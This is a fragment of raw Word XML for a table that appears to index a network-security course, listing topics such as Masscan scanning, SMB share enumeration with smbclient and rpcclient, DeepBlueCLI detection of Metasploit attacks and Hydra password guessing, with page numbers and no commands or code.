            </w:pP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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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64B456A1" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72456549" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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6D28A984" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Scanning Large Ranges: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Masscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CDACA09" w14:textId="2204BF8F"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Masscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  awk</w:t>
            </w:r>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Masscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">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79BB727B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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76FE5323" w14:textId="2B3595F6"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TLS-Scan</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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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Other Scanners: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EyeWitness</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF737EA" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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B71E7C7" w14:textId="0E2D3AD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4090258B" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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748BC04" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7180D0" w14:textId="1CD84C1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SMB Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F67B846" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79155A6D" w14:textId="3D02FD4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77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="28836FD6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C61CE81" w14:textId="30EBC0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5F3BF7AA" w14:textId="41C6BD0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port 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A991591" w14:textId="36BC24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59F67A5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6373178B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55662F98" w14:textId="5F389C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4C3CC5AA" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5277F6BB" w14:textId="6AE25E0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5FBFE0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5FA29C6C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="515B0BA8" w14:textId="19E7E4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004DC9E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WmiObject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (WMI)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDB15E8" w14:textId="4346492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net.exe (Windows </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> non-Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BE43201" w14:textId="093E5E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5F07FB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10996335" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C57BB97" w14:textId="703688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Searching for SMB Shares: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SMBeagle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CC48053" w14:textId="7A72230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SMBeagle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="297BBC5B" w14:textId="38B68FD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503EF5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44483150" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677F98A8" w14:textId="7717BE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25104BE9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3CEC2D" w14:textId="4EBA041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1A68D01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265FEA67" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20989DD6" w14:textId="005898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19EBD111" w14:textId="07B6D069"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smbclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06C0471B" w14:textId="513B31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7486B1" w14:textId="42036CD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4898D1F6" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48B02A70" w14:textId="61D869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Using Samba's </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from Linux for More Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2958ED4B" w14:textId="0B661235"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rpcclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53943195" w14:textId="66DC869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3F0B13" w14:textId="1873B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64C94331" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BBA029" w14:textId="466508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SMB Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFC1DE9" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C144564" w14:textId="352426B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2B00B0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7BB35EC4" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182388DE" w14:textId="2D026AC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26466CDD" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CB274F" w14:textId="46EF49B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54840B4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293D753C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2B478D6D" w14:textId="50C78B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73094AC3" w14:textId="65D5285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SmbSession</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  Net use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46861593" w14:textId="64EB297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F67043" w14:textId="68B10B3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C79FB3B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="35C74FCC" w14:textId="1244FE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A4D0626" w14:textId="3D7A389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Block access to TCP/445,135,137,139  UDP/445,137,138</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F1ACC2" w14:textId="2CA2F1C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6B0728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5A06242A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA7E0F2" w14:textId="7BE917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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AEB0ADA" w14:textId="02234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0CA2C3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2DD3075E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25577371" w14:textId="0FA39C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Defense Spotlight: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DeepBlueCLI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F482B4" w14:textId="14D9C98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useful, not perfect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D470644" w14:textId="1E518E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3D5EBF14" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="29AA8646" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13CE72E6" w14:textId="467E2EA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Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="721A9B8C" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CE3A55" w14:textId="39CA1D9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724A5D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99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="1BD25D4E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DEDE43B" w14:textId="71D0031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Metasploit Attack Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5952C5" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC93744" w14:textId="19DEF90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29E5617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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="7D5A243A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7052404A" w14:textId="5414A94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Non-Malicious Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E79579D" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3022D7E9" w14:textId="1A03ADE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5FD9BF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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="2B2A7B82" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="062CC5A7" w14:textId="37AF141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Output Formatting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA73F74" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713A3049" w14:textId="1A341BA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3F9AD2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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="3D78F973" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D100FF" w14:textId="52A25D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Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481FF726" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5955B5" w14:textId="5C1615E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319D4C3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104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="2DDEA97C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65067D94" w14:textId="39DD17E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DeepBlueCLI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450C7793" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A540FF5" w14:textId="56544F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7A82A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105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="1E82D91B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5218D78E" w14:textId="6E1FF30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1E1256CD" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4098C5BF" w14:textId="7B6BC47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FE710F8" w14:textId="3EFB0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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="6F1FB5CF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CCFA093" w14:textId="5ABBF5A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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644FF0FB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DCB542" w14:textId="137A999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228A47" w14:textId="3F5FEE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55CFB2B1" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8EB53F" w14:textId="77CC60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THC Hydra Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33CBECDB" w14:textId="3A8BE43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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314A6587" w14:textId="6162B3A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5E503D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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B7BABF" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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20454978" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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219C4B19" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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007CCEEE" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
